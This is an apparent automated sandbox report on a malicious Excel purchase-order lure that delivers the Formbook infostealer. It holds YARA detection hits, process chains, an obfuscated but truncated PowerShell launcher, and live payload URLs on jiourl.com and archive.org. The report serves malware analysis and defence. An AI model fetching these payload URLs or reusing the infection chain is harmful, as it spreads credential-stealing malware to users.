            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
            Source: powershell.exe, 0000000A.00000002.444696114.000000000275A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
            Source: powershell.exe, 0000000A.00000002.444135080.0000000000645000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.444696114.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
            Source: powershell.exe, 00000008.00000002.450023886.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
            Source: jiourl.com.url.3.drString found in binary or memory: https://jiourl.com/
            Source: GmwgTs.url.3.drString found in binary or memory: https://jiourl.com/GmwgTs
            Source: Mac Purchase Order PO102935.xlsString found in binary or memory: https://jiourl.com/GmwgTsT
            Source: ~DF9EF225C0E73309A0.TMP.0.dr, 5B430000.0.drString found in binary or memory: https://jiourl.com/GmwgTsyX
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: 2893AGJN.13.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/gymuniversity.net?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=expired
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ziyuan.baidu.com/image.gif
            Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2

            E-Banking Fraud

            Source: Yara match File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3148, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: Mac Purchase Order PO102935.xls OLE: Microsoft Excel 2007+
            Source: 5B430000.0.dr OLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\GmwgTs.url
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\jiourl.com.url
            Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 9406
            Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…' (obfuscated Base64 string, truncated in the report)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\find.exe Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0042C193 NtClose, 11_2_0042C193
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B07AC NtCreateMutant, LdrInitializeThunk, 11_2_022B07AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFAE8 NtQueryInformationProcess, LdrInitializeThunk, 11_2_022AFAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFB68 NtFreeVirtualMemory, LdrInitializeThunk, 11_2_022AFB68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AF9F0 NtClose, LdrInitializeThunk, 11_2_022AF9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFDC0 NtQuerySystemInformation, LdrInitializeThunk, 11_2_022AFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B0060 NtQuerySection, 11_2_022B0060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B0078 NtResumeThread, 11_2_022B0078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B0048 NtProtectVirtualMemory, 11_2_022B0048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B00C4 NtCreateFile, 11_2_022B00C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B010C NtOpenDirectoryObject, 11_2_022B010C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B01D4 NtSetValueKey, 11_2_022B01D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B0C40 NtGetContextThread, 11_2_022B0C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B10D0 NtOpenProcessToken, 11_2_022B10D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B1148 NtOpenThread, 11_2_022B1148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFA20 NtQueryInformationFile, 11_2_022AFA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFA50 NtEnumerateValueKey, 11_2_022AFA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFAB8 NtQueryValueKey, 11_2_022AFAB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFAD0 NtAllocateVirtualMemory, 11_2_022AFAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFB50 NtCreateKey, 11_2_022AFB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFBB8 NtQueryInformationToken, 11_2_022AFBB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFBE8 NtQueryVirtualMemory, 11_2_022AFBE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AF8CC NtWaitForSingleObject, 11_2_022AF8CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AF938 NtWriteFile, 11_2_022AF938
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B1930 NtSetContextThread, 11_2_022B1930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AF900 NtReadFile, 11_2_022AF900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFE24 NtWriteVirtualMemory, 11_2_022AFE24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFEA0 NtReadVirtualMemory, 11_2_022AFEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFED0 NtAdjustPrivilegesToken, 11_2_022AFED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFF34 NtQueueApcThread, 11_2_022AFF34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFFB4 NtCreateSection, 11_2_022AFFB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFFFC NtCreateProcessEx, 11_2_022AFFFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFC30 NtOpenProcess, 11_2_022AFC30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFC60 NtMapViewOfSection, 11_2_022AFC60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFC48 NtSetInformationFile, 11_2_022AFC48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFC90 NtUnmapViewOfSection, 11_2_022AFC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFD5C NtEnumerateKey, 11_2_022AFD5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022AFD8C NtDelayExecution, 11_2_022AFD8C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B1D80 NtSuspendThread, 11_2_022B1D80
            Source: Mac Purchase Order PO102935.xls OLE indicator, VBA macros: true
            Source: ~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp.3.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 002459F4D4758011B4D7F36935F1FE323494B847F8C173A551076A3D30475EBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0232F970 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 022BE2A8 appears 60 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0230373B appears 253 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 022BDF5C appears 137 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02303F92 appears 132 times
            Source: sqlite3.dll.13.dr Static PE information: Number of sections : 18 > 10
            Source: C:\Windows\SysWOW64\find.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
            Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3148, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@15/34@16/8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\26QMPUB3.txt
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7D0B.tmp
            Source: Mac Purchase Order PO102935.xls OLE indicator, Workbook stream: true
            Source: 5B430000.0.dr OLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................T.r.u.e.(.P.....T.......\.......|.......``.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ....................................u.e.(.P.....T.......\.......|.......d`.........................s............................................
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\find.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
